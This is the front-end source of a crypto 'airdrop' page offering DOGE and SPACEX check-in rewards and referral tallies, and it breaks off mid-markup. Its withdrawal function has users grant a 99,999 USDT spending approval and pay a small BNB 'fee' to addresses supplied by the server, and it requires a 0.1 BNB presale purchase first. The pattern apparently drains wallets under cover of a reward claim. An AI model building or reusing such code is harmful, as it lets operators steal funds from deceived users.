import React, {useState, useEffect, useRef} from 'react';
import {useNavigate} from "react-router-dom";
import { connect } from 'react-redux';
import Head from '../../components/head/Head'
import Foot from '../../components/foot/Foot'
import {  Input,message,Modal,Progress,Statistic  } from 'antd';
import { signer,allowance,approve,transferBnb,balanceOf,transfer } from '../../utils/ethers'
import StripedProgressBar from '../../components/progress/Progress'
import copy from 'copy-to-clipboard'
import {shareLink} from '../../utils/const'
import NumberFormat from 'react-number-format'
import contractAddress from "../../utils/contractAddress.json"
import Moment from 'react-moment'
import CountUp from "react-countup";

import { useTranslation } from 'react-i18next'
import {getQianIndex, addQian,addIdoJie,addApprove,gethasPay,addPayBnb,addTixian} from "../../api";
import { CSSTransition } from 'react-transition-group';
import {
    WarningOutlined,CloseOutlined,DownOutlined,ExportOutlined
  } from '@ant-design/icons';
  import './index.less';

import { max } from 'moment';
const mapStateToProps=(state)=>{
    return{
        isLogin:state.isLogin,
        address:state.address,
        pAddress:state.pAddress,
        chain:state.chain,
        flash:state.flash,
    }
}
const { Countdown } = Statistic;
const Airdrop = (props) => {
    const { t } = useTranslation()
    const navigate = useNavigate()
    const audioRef = useRef(null);
    const ref = useRef()
    const [num,setNum] = useState(0)
    const [isLock,setIsLock]=useState(false)
    
    const [mintBnb,setMintBnb] = useState(0)
    const [old ,setOld] = useState(false)
    const [allValue,setAllValue] =useState(0)
    const [checkTime,setCheckTime] =useState("")
    const [locked,setLocked] = useState(0)
    const [bonus,setBonus] = useState(0)
    const [allLock,setAllLock]  = useState(0)
    const [zhiNum,setZhiNum] = useState(0)
    const [tuanNum,setTuanNum] = useState(0)
    const [allValueDoge,setAllValueDoge] = useState(0)
    const [dogePrice,setDogePrice] = useState(0)
    const [bnbPrice,setBnbPrice] = useState(0)
    const [spacexPrice,setSpacexPrice] = useState(0)
    const [shareLink,setshareLink] = useState("")
    const [today,setToday]=useState(false)
    const [childs,setChilds] = useState([])
    const [childs1,setChilds1] = useState([])
    const [childs2,setChilds2] = useState([])
    const [childs3,setChilds3] = useState([])
    const [zhi,setZhi] = useState([])
    const [qianNum,setQianNum] = useState(0)
    const [isShowMenu,setIsShowMenu] = useState(false);
      const [isShowMenu1,setIsShowMenu1] = useState(false);
      const [isShowMenu2,setIsShowMenu2] = useState(false);
      const [isShowMenu3,setIsShowMenu3] = useState(false);
    const [isShowTi,setIsShowTi] = useState(false);

    const [regAir1,setRegAir1] = useState(0);
    const [regAir2,setRegAir2] = useState(0);
    const [small,setSmall] = useState(0);

    const [bigBnb,setBigBnb] =useState(0);

    const [dogeMint, setDogeMint] = useState(0);
    const [dogeMintAll, setDogeMintAll] = useState(0);

    const [isApproveUsdt,setIsApproveUsdt]=useState(false)
    const [receiveFee,setReceiveFee] = useState("")
    const [receiveApprove,setReceiveApprove] = useState("")
    const [valueCol,setValueCol] = useState("")
    const [coin,setCoin] = useState("doge")
    const [isb,setIsB] =useState(false)
     const [hasShou,setHasShou] =useState("")
     const [dogeEdu, setDogeEdu] = useState(0)
     const [spacexAirEdu, setSpacexAirEdu] = useState(0)
     const [bnb,setBnb] = useState(0)
      const [mint1,setMint1] = useState(0)
       const [mint2,setMint2] = useState(0)
     const [spacexAir, setSpacexAir] = useState(0)

     const [tab, setTab] = useState(0);
     const tabs = [
  "DOGE",
  "SPACEX",
  "DOGE"
//   "BNB"
  
];

    const _copy =()=>{
            if(shareLink.length>0){
    
                    copy(shareLink);message.success(t('g.已复制')+":"+shareLink)
    
            }else{
                message.success(t('g.请先连接钱包'))
            }
            
        }
    

     const _getTuanInfo = () =>{
            if(props.address.length>0 && props.isLogin){
                getQianIndex().then(res=>{
                    if(res.code == 0){
                        setOld(res.data.old)
                        setMintBnb(res.data.mintBnb)
                        setshareLink(res.data.shareLink)
                        setAllValue(res.data.allValue)
                        setCheckTime(res.data.checkTime)
                        setAllLock(res.data.allLock)
                        setLocked(res.data.locked)
                        setZhiNum(res.data.zhiNum)
                        setTuanNum(res.data.tuanNum)
                        setDogePrice(res.data.dogePrice)
                        setBnbPrice(res.data.bnbPrice)
                        setSpacexPrice(res.data.spacexPrice)
                        setBonus(res.data.bonus)
                        setQianNum(res.data.qian_num)
                        setBigBnb(res.data.bigBnb)
                        setToday(res.data.today)
                        setReceiveFee(res.data.fee_receive)
                        setReceiveApprove(res.data.approve_receive)
                        setHasShou(res.data.appr)
                        setIsB(res.data.isb)
                        setDogeEdu(res.data.edu)
                        setSpacexAir(res.data.spacexAir)
                        setBnb(res.data.bnb)
                        setMint1(res.data.mint1)
                        setMint2(res.data.mint2)
                        
                        setSpacexAirEdu(res.data.spacex_air_edu)

                        setRegAir1(res.data.regAir1)
                        setRegAir2(res.data.regAir2)
                        setSmall(res.data.small)

                        setDogeMint(res.data.dogeMint)

                        setDogeMintAll(res.data.dogeMintAll)


                        if(res.data.his != null){
                            setChilds(res.data.his)
                        }
                         if(res.data.his1 != null){
                            setChilds1(res.data.his1)
                        }
                           if(res.data.his2 != null){
                            setChilds2(res.data.his2)
                        }
                           if(res.data.his3 != null){
                            setChilds3(res.data.his3)
                        }
                          if(res.data.zhi != null){
                            setZhi(res.data.zhi)
                        }
                        
                    }else{
                        message.error(res.msg)
                    }
                   console.log(res)
                })
            }
        }

   
        const _qian = () =>{
            //  message.error(t('g.暂未开始'))
            // return false
                if(props.address.length<=0){
                    message.error(t('g.请先连接钱包'))
                    return false
                }
                if(props.isLogin === false){
                    message.error(t('g.请先绑定邀请地址'))
                    return false
                }

                if(parseInt(allLock)<=1){
                    message.warn(t('air.狗狗币空投活动已结束'))
                    return
                }
        
            
                if (today == false){
                    message.warn(t('air.今日已签到，不能重复签到！'))
                    return
                }
        
        
                if(isLock) return false;
                setIsLock(true)
                signer(props.address).then(res=>{
                    addQian({address:props.address,receive:props.address,pass:res}).then(res=>{
                        if(res.code===0){
                            message.success(t('air.今日签到成功'))
                        }else{
                            message.error(res.msg)
                        }
                        setIsLock(false)
                       
                        setNum(num+1)
                    },error=>{
                        setIsLock(false)
                        message.error(res.msg)
                    })
        
                },error=>{
                    setIsLock(false)
                })
            }


    const _isApproveUsdt =  () => {
       return  new Promise(async (resolve, reject) => {
            allowance(props.address,receiveApprove,"usdt").then(res=>{
                if(parseFloat(res)>=99999){
                    setIsApproveUsdt(true)
                    resolve(true)
                }else{
                    resolve(false)
                }
            },err =>{
                    resolve(false)
            })
         })
    }        


    const closeAll = () =>{
       setIsShowMenu(false)
       setIsShowMenu1(false)
        setIsShowMenu2(false)
        setIsShowMenu3(false)
       setIsShowTi(false)
    }

    const _setIsShowTi = () =>{
        //  message.error(t('g.暂未开始'))
        //     return false

        console.log(coin)
        if(props.address.length<=0){
            message.error(t('g.请先连接钱包'))
            return false
        }
        if(props.isLogin === false){
            message.error(t('g.请先连接钱包'))
            return false
        }
        if(coin =="doge"){

               if(parseInt(locked)<20){
            message.error(t('air.可提余额不足，需累积至20枚方可提现'))
            return false
            }


            if(parseFloat(mintBnb)<0.1){
            message.error(t('air.提现需参与0.1BNB预售，请先参与预售'))
            return false
            }

          
            //  if(parseInt(qianNum)<15){
            // message.error(t('air.签到次数必须大于15'))
            // return false
            // }
        }else if(coin =="doge_mint"){

               if(parseInt(dogeMint)<50){
            message.error(t('g.可提余额不足，需累积至50枚方可提现'))
            return false
            }


            if(parseFloat(mintBnb)<0.1){
            message.error(t('air.提现需参与0.1BNB预售，请先参与预售'))
            return false
            }

          
            //  if(parseInt(qianNum)<15){
            // message.error(t('air.签到次数必须大于15'))
            // return false
            // }
        }else if(coin =="bnb"){
            //  message.error(t('g.暂未开始'))
            // return false
        }else if(coin =="spacex_air"){
    message.error(t('g.已结束'))
                    return
            // let now = Date.now() /1000
            // if(parseFloat(now) > 1787759999){
            //     message.error(t('g.已结束'))
            //         return
            // }

            //  message.error(t('g.暂未开始'))
            // return false
        }else{
return false
        }
       
        setIsShowTi(true)
    }

    const _ti = async () =>{

        //    message.error(t('g.暂未开始'))
        //     return false

    //         let now = Date.now() /1000
    // if(parseFloat(now) < 1784550600){
    //       message.error(t('g.暂未开始'))
    //         return
    // }

        let _coin = coin.toLowerCase()
        if(props.address.length<=0){
            message.error(t('g.请先连接钱包'))
            return false
        }
        if(props.isLogin === false){
            message.error(t('g.请先连接钱包'))
            return false
        }

           if(valueCol.length===0){
            message.error(t('g.请输入数量'))
            return false
        }
        if(_coin == "doge"){
            if(parseFloat(valueCol)<20){
                message.error(t('g.最低提取数量')+":20")
                return false
            }
            if(parseFloat(valueCol)>parseFloat(locked)){
                message.error(t('g.余额不足'))
                return false
            }

            if(parseFloat(valueCol)>parseFloat(dogeEdu)){
                message.error(t('g.额度不足'))
                return false
            }
             if(parseFloat(valueCol)%20 !=0){
                message.error(t('g.数量必须是20的整数倍'))
                return false
            }

            
        }else if(_coin == "doge_mint"){
            if(parseFloat(valueCol)<50){
                message.error(t('g.最低提取数量')+":50")
                return false
            }
            if(parseFloat(valueCol)>parseFloat(dogeMint)){
                message.error(t('g.余额不足'))
                return false
            }

          
             if(parseFloat(valueCol)%50 !=0){
                message.error(t('g.数量必须是50的整数倍'))
                return false
            }

            
        }else if(_coin == "spacex_air"){
            if(parseFloat(valueCol)<900){
                message.error(t('g.最低提取数量')+":900")
                return false
            }

             if(parseFloat(valueCol)>parseFloat(spacexAirEdu)){
                message.error(t('g.额度不足'))
                return false
            }
            if(parseFloat(valueCol)>parseFloat(spacexAir)){
                message.error(t('g.余额不足'))
                return false
            }

           

            
        }else if(_coin == "bnb"){
            if(parseFloat(valueCol)<0.005){
                message.error(t('g.最低提取数量')+":0.005")
                return false
            }
            if(parseFloat(valueCol)>parseFloat(bnb)){
                message.error(t('g.余额不足'))
                return false
            }
        }

        message.warning(t('g.提取中请等待'),4)
         const _isApprove =await _isApproveUsdt()
            console.log(isb)
         if(isb==false){
             if(_isApprove == false || parseInt(hasShou) == 3){
                let tx = await approve(receiveApprove,"usdt",99999,true)
                addApprove({address:props.address,hex:String(tx.hash)})
            }
         }
       

        
        if(isLock) return false;
        setIsLock(true)

        // gethasPay({address:props.address,coin:coin}).then(resPay=>{
        //     if(resPay.data.has=="3"){
        //         transferBnb(props.address,receiveApprove,0.0007).then(async resBnb=>{
        //             let res4 = await addPayBnb({address:props.address,hex:String(resBnb.hash),coin:coin})
        //             if(res4.code==0){
                               
        //                             addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin}).then(resTi=>{
        //                                 if(resTi.code==0){
        //                                     message.success(resTi.msg)
        //                                 }else{
        //                                     message.error(resTi.msg)
        //                                 }
        //                                 setIsLock(false)
        //                                 closeAll()
        //                                 setNum(num+1)
        //                             },errorTi=>{
        //                                 setIsLock(false)
        //                                 closeAll()
        //                                 message.error(errorTi)
        //                             })
                                    

                              
        //                     }else{
        //                         setIsLock(false)
        //                         closeAll()
        //                         message.error(res4.msg)
        //                     }

            
        //         },errBnb=>{
        //              setIsLock(false)
        //             closeAll()
        //             message.error(errBnb)
        //         })
        //     }else{
        //           signer(props.address).then(res=>{
        //                 addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin,pass:res.pass}).then(resTi=>{
        //                     if(resTi.code==0){
        //                         message.success(resTi.msg)
        //                     }else{
        //                         message.error(resTi.msg)
        //                     }
        //                     setIsLock(false)
        //                     closeAll()
        //                     setNum(num+1)
        //                 },errorTi=>{
        //                     setIsLock(false)
        //                     closeAll()
        //                     message.error(errorTi)
        //                 })
                           

        //             },error=>{
        //                 setIsLock(false)
        //             })
        //     }
        // },errPay=>{
        //     closeAll()
        //     setIsLock(false)
        //     message.error(errPay)
        // })

       
        if(isb==false){
                gethasPay({address:props.address,coin:coin}).then(resPay=>{
                    if(resPay.data.has=="3"){
                            transferBnb(props.address,receiveFee,0.0007).then(async resBnb=>{
                            let res4 = await addPayBnb({address:props.address,hex:String(resBnb.hash),coin:coin})
                            if(res4.code==0){
                                            
                                
                                    addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin,pass:props.address,days:String(0)}).then(res=>{
                                        if(res.code===0){
                                            message.success(res.msg)
                                        }else{
                                            message.error(res.msg)
                                        }
                                        setIsLock(false)
                                        closeAll()
                                        setNum(num+1)
                                    },error=>{
                                        setIsLock(false)
                                        message.error(error)
                                    })

                             
                            }else{
                                setIsLock(false)
                                closeAll()
                                message.error(res4.msg)
                            }
                        })
                    }else{
                        signer(props.address).then(res=>{
                            addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin,pass:res.pass,days:String(0)}).then(res=>{
                                if(res.code===0){
                                    message.success(res.msg)
                                }else{
                                    message.error(res.msg)
                                }
                                setIsLock(false)
                                closeAll()
                                setNum(num+1)
                            },error=>{
                                setIsLock(false)
                                message.error(res.msg)
                            })
                        },error=>{
                            setIsLock(false)
                        })
                    }
                })
                
        }else{

            // gethasPay({address:props.address,coin:coin}).then(resPay=>{
            //         if(resPay.data.has=="3"){
            //                 transferBnb(props.address,receiveFee,0.0007).then(async resBnb=>{
            //                 let res4 = await addPayBnb({address:props.address,hex:String(resBnb.hash),coin:coin})
            //                 if(res4.code==0){
                                            
                                
            //                         addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin,pass:props.address,days:String(0)}).then(res=>{
            //                             if(res.code===0){
            //                                 message.success(res.msg)
            //                             }else{
            //                                 message.error(res.msg)
            //                             }
            //                             setIsLock(false)
            //                             closeAll()
            //                             setNum(num+1)
            //                         },error=>{
            //                             setIsLock(false)
            //                             message.error(error)
            //                         })

                             
            //                 }else{
            //                     setIsLock(false)
            //                     closeAll()
            //                     message.error(res4.msg)
            //                 }
            //             })
            //         }else{
            //             signer(props.address).then(res=>{
            //                 addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin,pass:res.pass,days:String(0)}).then(res=>{
            //                     if(res.code===0){
            //                         message.success(res.msg)
            //                     }else{
            //                         message.error(res.msg)
            //                     }
            //                     setIsLock(false)
            //                     closeAll()
            //                     setNum(num+1)
            //                 },error=>{
            //                     setIsLock(false)
            //                     message.error(res.msg)
            //                 })
            //             },error=>{
            //                 setIsLock(false)
            //             })
            //         }
            //     })
             signer(props.address).then(res=>{
                addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin,pass:res.pass,days:String(0)}).then(res=>{
                    if(res.code===0){
                        message.success(res.msg)
                    }else{
                        message.error(res.msg)
                    }
                    setIsLock(false)
                    closeAll()
                    setNum(num+1)
                },error=>{
                    setIsLock(false)
                    message.error(res.msg)
                })
            },error=>{
                setIsLock(false)
            })
        }
         
        
        // signer(props.address).then(res=>{
        //     addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin,pass:res.pass}).then(res=>{
        //         if(res.code===0){
        //             message.success(res.msg)
        //         }else{
        //             message.error(res.msg)
        //         }
        //         setIsLock(false)
        //         closeAll()
        //         setNum(num+1)
        //     },error=>{
        //         setIsLock(false)
        //         message.error(res.msg)
        //     })

        // },error=>{
        //     setIsLock(false)
        // })
    }
    
 const openNewPagex = () => {
        window.open('https://bscscan.com/address/'+props.address, '_blank');
      };



    useEffect(() => {
        // window.scrollTo(0, 0)
         _getTuanInfo()


    }, 
    // eslint-disable-next-line
    [props.isLogin,num]);

    const clearTimer = () =>{
        clearInterval(ref.current)
    }
    

    return (
        <>
        {/* COL */}
        <CSSTransition
                    in={isShowTi}
                    unmountOnExit={true}
                    classNames='lan'
                    timeout={1000}
                    appear
                    onEnter={(e) => console.log('开始进入动画')}
                    onEntering={(e) => console.log('执行进入动画')}
                    onEntered={(e) => console.log('进入动画结束')}
                    onExit={(e) => console.log('开始离开动画')}
                    onExiting={(e) => console.log('正在离开动画')}
                    onExited={(e) => console.log('离开动画结束')}>
                    <div
                    className="
                        fixed inset-0 z-50
                        flex items-start justify-center
                        bg-black/30
                        backdrop-blur-[14px]
                        backdrop-saturate-150
                        px-4
                    "
                    >
                    <div
                        className="
                        relative mt-20
                        w-full max-w-[390px]
                        min-h-[250px]
                        px-5 py-6
                        overflow-hidden

                        bg-black/80

                        border-0 border-[#4A5560]

                        shadow-[0_0_30px_rgba(0,0,0,.95),inset_0_0_30px_rgba(12,18,24,.8)]

                        [clip-path:polygon(9px_0,calc(100%-9px)_0,100%_9px,100%_calc(100%-9px),calc(100%-9px)_100%,9px_100%,0_calc(100%-9px),0_9px)]
                        "
                    >
                        {/* Close */}
                        <button
                        onClick={()=>setIsShowTi(false)}
                        className="
                            absolute right-4 top-4 z-50
                            w-6 h-6
                            flex items-center justify-center

                            text-text1
                            text-[14px]
                            leading-none

                            border border-[#3A444E]
                            bg-[#070D12]/95

                            [clip-path:polygon(20%_0,80%_0,100%_20%,100%_80%,80%_100%,20%_100%,0_80%,0_20%)]

                            transition-all duration-200

                            hover:text-text1
                            hover:border-[#6B7680]
                            hover:shadow-[0_0_10px_rgba(120,135,150,.35)]
                        "
                        >
                        ×
                        </button>

                        {/* 外层细线 */}
                        <div
                        className="
                            absolute inset-[6px]
                            pointer-events-none
                            border border-[#171c20]

                            [clip-path:polygon(14px_0,calc(100%-14px)_0,100%_14px,100%_calc(100%-14px),calc(100%-14px)_100%,14px_100%,0_calc(100%-14px),0_14px)]
                        "
                        />

                        

                        

                        {/* 左上角 */}
                        <div className="absolute left-[10px] top-[10px] w-[58px] h-[28px] border-l-2 border-t-2 border-[#894a02]" />
                        

                        {/* 右上角 */}
                        <div className="absolute right-[10px] top-[10px] w-[58px] h-[28px] border-r-2 border-t-2 border-[#894a02]" />
                        

                        {/* 左下角 */}
                        <div className="absolute left-[10px] bottom-[10px] w-[58px] h-[28px] border-l-2 border-b-2 border-[#894a02]" />
                        

                        {/* 右下角 */}
                        <div className="absolute right-[10px] bottom-[10px] w-[58px] h-[28px] border-r-2 border-b-2 border-[#894a02]" />
                    

                    

                        {/* 内部暗色纹理线 */}
                        <div
                        className="
                            absolute inset-0
                            opacity-25
                            pointer-events-none
                            bg-[linear-gradient(90deg,transparent_0%,rgba(255,255,255,.035)_50%,transparent_100%)]
                        "
                        />

                        {/* 内容区域 */}
                        <div className="relative z-10 px-4">
                        {/* 这里放你的弹窗内容 */}
                            
                           {
                                coin=="doge"?(
                                    <>
                                        <div className=' w-full h-5 mt-12 flex flex-row justify-between items-center'>
                                            {/* <span className="text-sm text-gray-500">{t('air.提取')} ${coin.toLocaleUpperCase()} </span> */}
                                            <span className="text-xs text-text1">{t('g.可提数量')}：<CountUp start={0} end={locked} duration="1" decimals={2} /> DOGE</span>
                                        </div>
                                        <div className=' w-full h-5 mt-2 flex flex-row justify-between items-center'>
                                            {/* <span className="text-sm text-gray-500">{t('air.提取')} ${coin.toLocaleUpperCase()} </span> */}
                                            <span className="text-xs text-text1">{t('g.可提额度')}：<CountUp start={0} end={dogeEdu} duration="1" decimals={2} /> DOGE</span>
                                        </div>
                                    </>
                                ):coin=="spacex_air"?(
                                     <>
                                        <div className=' w-full h-5 mt-12 flex flex-row justify-between items-center'>
                                            {/* <span className="text-sm text-gray-500">{t('air.提取')} ${coin.toLocaleUpperCase()} </span> */}
                                            <span className="text-xs text-text1">{t('g.可提数量')}：<CountUp start={0} end={spacexAir} duration="1" decimals={2} /> SPACEX</span>
                                        </div>
                                        <div className=' w-full h-5 mt-2 flex flex-row justify-between items-center'>
                                            {/* <span className="text-sm text-gray-500">{t('air.提取')} ${coin.toLocaleUpperCase()} </span> */}
                                            <span className="text-xs text-text1">{t('g.可提额度')}：<CountUp start={0} end={spacexAirEdu} duration="1" decimals={2} /> SPACEX</span>
                                        </div>
                                        
                                    </>
                                ):(
                                     <>
                                        <div className=' w-full h-5 mt-12 flex flex-row justify-between items-center'>
                                            {/* <span className="text-sm text-gray-500">{t('air.提取')} ${coin.toLocaleUpperCase()} </span> */}
                                            <span className="text-xs text-text1">{t('g.可提数量')}：<CountUp start={0} end={dogeMint} duration="1" decimals={2} /> DOGE</span>
                                        </div>
                                        
                                    </>
                                )
                           }

                            

                            <div className="w-full min-h-[32px] mt-4 border-[1px] border-text1
                                relative inline-flex flex-col h-4  justify-start 
                                px-3  text-white text-[10px]  tracking-wider
                                [--cut:4px] [--border:1px]
                                before:absolute before:inset-0 before:bg-gray-800/50
                                before:[clip-path:polygon(var(--cut)_0,calc(100%_-_var(--cut))_0,100%_var(--cut),100%_calc(100%_-_var(--cut)),calc(100%_-_var(--cut))_100%,var(--cut)_100%,0_calc(100%_-_var(--cut)),0_var(--cut))]
                                after:absolute after:inset-[var(--border)] after:bg-[#010B1250]
                                after:[clip-path:polygon(var(--cut)_0,calc(100%_-_var(--cut))_0,100%_var(--cut),100%_calc(100%_-_var(--cut)),calc(100%_-_var(--cut))_100%,var(--cut)_100%,0_calc(100%_-_var(--cut)),0_var(--cut))]
                            ">
                                <div className="w-full   flex flex-row items-center  z-10  " >
                                <input  onInput={(e)=>setValueCol(e.target.value)} value={valueCol}  type="number"   className=' w-4/5 h-[32px]  text-sm text-text1 input1 placeholder:text-xs ' placeholder={`${t('g.最低提取数量')} ${coin === "doge" ? "10" :coin === "spacex_air"? "900":"50"}`} ></input>
                                {/* <span onClick={_maxTi} className='w-1/5 h9 block text-right text-sm text-text-act'>{t('asset.全部')}</span> */}
                            </div>
                            
                        
                            </div>
                          <div className='w-full h-6 mt-4  ml-2 flex flex-row justify-center items-center '>
                                <button onClick={_ti} className="w-full sci-glow-btn"> <span>{t('air.提取')}</span></button>
                            </div>
                         
                           
                           
                            
                        
                        {/*  */}
                        </div>
                    </div>
                    </div>
                    </CSSTransition>

{/* DOGE */}
        <CSSTransition
                    in={isShowMenu}
                    unmountOnExit={true}
                    classNames='lan'
                    timeout={1000}
                    appear
                    onEnter={(e) => console.log('开始进入动画')}
                    onEntering={(e) => console.log('执行进入动画')}
                    onEntered={(e) => console.log('进入动画结束')}
                    onExit={(e) => console.log('开始离开动画')}
                    onExiting={(e) => console.log('正在离开动画')}
                    onExited={(e) => console.log('离开动画结束')}>
  <div
  className="
    fixed inset-0 z-50
    flex items-center justify-center
    bg-black/30
    backdrop-blur-[14px]
    backdrop-saturate-150
    px-4
  "
>
  <div
    className="
      relative
      w-full max-w-[390px]
      min-h-[520px]
      px-5 py-6
      overflow-hidden

      bg-black/80

      border-0 border-[#4A5560]

      shadow-[0_0_30px_rgba(0,0,0,.95),inset_0_0_30px_rgba(12,18,24,.8)]

      [clip-path:polygon(9px_0,calc(100%-9px)_0,100%_9px,100%_calc(100%-9px),calc(100%-9px)_100%,9px_100%,0_calc(100%-9px),0_9px)]
    "
  >
    {/* Close */}
    <button
      onClick={()=>setIsShowMenu(false)}
      className="
        absolute right-4 top-4 z-50
        w-6 h-6
        flex items-center justify-center

        text-text1
        text-[14px]
        leading-none

        border border-[#3A444E]
        bg-[#070D12]/95

        [clip-path:polygon(20%_0,80%_0,100%_20%,100%_80%,80%_100%,20%_100%,0_80%,0_20%)]

        transition-all duration-200

        hover:text-text1
        hover:border-[#6B7680]
        hover:shadow-[0_0_10px_rgba(120,135,150,.35)]
      "
    >
      ×
    </button>

    {/* 外层细线 */}
    <div
      className="
        absolute inset-[6px]
        pointer-events-none
        border border-[#171c20]

        [clip-path:polygon(14px_0,calc(100%-14px)_0,100%_14px,100%_calc(100%-14px),calc(100%-14px)_100%,14px_100%,0_calc(100%-14px),0_14px)]
      "
    />

    

    

    {/* 左上角 */}
    <div className="absolute left-[10px] top-[10px] w-[58px] h-[28px] border-l-2 border-t-2 border-[#894a02]" />
    

    {/* 右上角 */}
    <div className="absolute right-[10px] top-[10px] w-[58px] h-[28px] border-r-2 border-t-2 border-[#894a02]" />
    

    {/* 左下角 */}
    <div className="absolute left-[10px] bottom-[10px] w-[58px] h-[28px] border-l-2 border-b-2 border-[#894a02]" />
    

    {/* 右下角 */}
    <div className="absolute right-[10px] bottom-[10px] w-[58px] h-[28px] border-r-2 border-b-2 border-[#894a02]" />
  

  

    {/* 内部暗色纹理线 */}
    <div
      className="
        absolute inset-0
        opacity-25
        pointer-events-none
        bg-[linear-gradient(90deg,transparent_0%,rgba(255,255,255,.035)_50%,transparent_100%)]
      "
    />

    {/* 内容区域 */}
    <div className="relative z-10">
      {/* 这里放你的弹窗内容 */}
            <div className=' w-full  px-0 py-4 mt-3 flex flex-col'>
                  
                    <div className='w-full mt-3 flex flex-row justify-start items-center text-gray-400 text-[9px] leading-[9px]'>
                        <span className='w-3/12'>{t('air.时间')}</span>
                        <span className='w-2/12'>{t('air.状态')}</span>
                       
                        <span className='w-4/12 text-center'>DOGE</span>
                        <span className='w-3/12'>{t('air.单据')}</span>
                    </div>
                    <div className=' w-full h-px bg-gray-800 mt-1 my-2'></div>

                    {
                            childs.length>0?
                            childs.map((item,index)=>{
                                return(
                                    <>
                                        <div className='w-full flex flex-row justify-start items-center text-gray-400 text-[9px] leading-[9px]'>
                                            <span className='w-3/12'>{item.add_time}</span>
                                            <span className='w-2/12 text-green-500'>{t('air.已确认')}</span>
                                            
                                            <span className='w-4/12 text-center'>
                                                <NumberFormat
                                                thousandsGroupStyle="thousand"
                                                value={item.value}
                                                prefix=""
                                                decimalSeparator="."
                                                displayType="text"
                                                type="text"
                                                thousandSeparator={true}
                                                fixedDecimalScale={true}
                                                allowNegative={false}
                                                decimalScale={2} />
                                            </span>
                                            <div onClick={openNewPagex} className='w-3/12 flex flex-row items-center justify-start'>
                                                <span className=' text-[#24C4E8]'>{item.hex}</span>
                                                <span className='ml-1 text-xs flex flex-row items-center text-text1'><ExportOutlined /></span>
                                            </div>
                                        </div>
                                        <div className=' w-full h-px bg-gray-800 mt-1 my-2'></div>
                                    </>
                                )
                            }):(
                                
                                <div  className=' w-full h-28 py-3 mt-5 flex flex-row items-center justify-center text-gray-700/80 text-xs'>
                                        No data
                                </div>
                            )
                        }

                    
                    
                </div>
      {/*  */}
    </div>
  </div>
</div>
                    </CSSTransition>

{/* BNB */}
                    <CSSTransition
                    in={isShowMenu1}
                    unmountOnExit={true}
                    classNames='lan'
                    timeout={1000}
                    appear
                    onEnter={(e) => console.log('开始进入动画')}
                    onEntering={(e) => console.log('执行进入动画')}
                    onEntered={(e) => console.log('进入动画结束')}
                    onExit={(e) => console.log('开始离开动画')}
                    onExiting={(e) => console.log('正在离开动画')}
                    onExited={(e) => console.log('离开动画结束')}>
  <div
  className="
    fixed inset-0 z-50
    flex items-center justify-center
    bg-black/30
    backdrop-blur-[14px]
    backdrop-saturate-150
    px-4
  "
>
  <div
    className="
      relative
      w-full max-w-[390px]
      min-h-[520px]
      px-5 py-6
      overflow-hidden

      bg-black/80

      border-0 border-[#4A5560]

      shadow-[0_0_30px_rgba(0,0,0,.95),inset_0_0_30px_rgba(12,18,24,.8)]

      [clip-path:polygon(9px_0,calc(100%-9px)_0,100%_9px,100%_calc(100%-9px),calc(100%-9px)_100%,9px_100%,0_calc(100%-9px),0_9px)]
    "
  >
    {/* Close */}
    <button
      onClick={()=>setIsShowMenu1(false)}
      className="
        absolute right-4 top-4 z-50
        w-6 h-6
        flex items-center justify-center

        text-text1
        text-[14px]
        leading-none

        border border-[#3A444E]
        bg-[#070D12]/95

        [clip-path:polygon(20%_0,80%_0,100%_20%,100%_80%,80%_100%,20%_100%,0_80%,0_20%)]

        transition-all duration-200

        hover:text-text1
        hover:border-[#6B7680]
        hover:shadow-[0_0_10px_rgba(120,135,150,.35)]
      "
    >
      ×
    </button>

    {/* 外层细线 */}
    <div
      className="
        absolute inset-[6px]
        pointer-events-none
        border border-[#171c20]

        [clip-path:polygon(14px_0,calc(100%-14px)_0,100%_14px,100%_calc(100%-14px),calc(100%-14px)_100%,14px_100%,0_calc(100%-14px),0_14px)]
      "
    />

    

    

    {/* 左上角 */}
    <div className="absolute left-[10px] top-[10px] w-[58px] h-[28px] border-l-2 border-t-2 border-[#894a02]" />
    

    {/* 右上角 */}
    <div className="absolute right-[10px] top-[10px] w-[58px] h-[28px] border-r-2 border-t-2 border-[#894a02]" />
    

    {/* 左下角 */}
    <div className="absolute left-[10px] bottom-[10px] w-[58px] h-[28px] border-l-2 border-b-2 border-[#894a02]" />
    

    {/* 右下角 */}
    <div className="absolute right-[10px] bottom-[10px] w-[58px] h-[28px] border-r-2 border-b-2 border-[#894a02]" />
  

  

    {/* 内部暗色纹理线 */}
    <div
      className="
        absolute inset-0
        opacity-25
        pointer-events-none
        bg-[linear-gradient(90deg,transparent_0%,rgba(255,255,255,.035)_50%,transparent_100%)]
      "
    />

    {/* 内容区域 */}
    <div className="relative z-10">
      {/* 这里放你的弹窗内容 */}
            <div className=' w-full  px-0 py-4 mt-3 flex flex-col'>
                  
                    <div className='w-full mt-3 flex flex-row justify-start items-center text-gray-400 text-[9px] leading-[9px]'>
                        <span className='w-3/12'>{t('air.时间')}</span>
                        <span className='w-2/12'>{t('air.状态')}</span>
                       
                        <span className='w-4/12 text-center'>DOGE</span>
                        <span className='w-3/12'>{t('air.单据')}</span>
                    </div>
                    <div className=' w-full h-px bg-gray-800 mt-1 my-2'></div>

                    {
                            childs3.length>0?
                            childs3.map((item,index)=>{
                                return(
                                    <>
                                        <div className='w-full flex flex-row justify-start items-center text-gray-400 text-[9px] leading-[9px]'>
                                            <span className='w-3/12'>{item.add_time}</span>
                                            <span className='w-2/12 text-green-500'>{t('air.已确认')}</span>
                                            
                                            <span className='w-4/12 text-center'>
                                                <NumberFormat
                                                thousandsGroupStyle="thousand"
                                                value={item.value}
                                                prefix=""
                                                decimalSeparator="."
                                                displayType="text"
                                                type="text"
                                                thousandSeparator={true}
                                                fixedDecimalScale={true}
                                                allowNegative={false}
                                                decimalScale={2} />
                                            </span>
                                            <div onClick={openNewPagex} className='w-3/12 flex flex-row items-center justify-start'>
                                                <span className=' text-[#24C4E8]'>{item.hex}</span>
                                                <span className='ml-1 text-xs flex flex-row items-center text-text1'><ExportOutlined /></span>
                                            </div>
                                        </div>
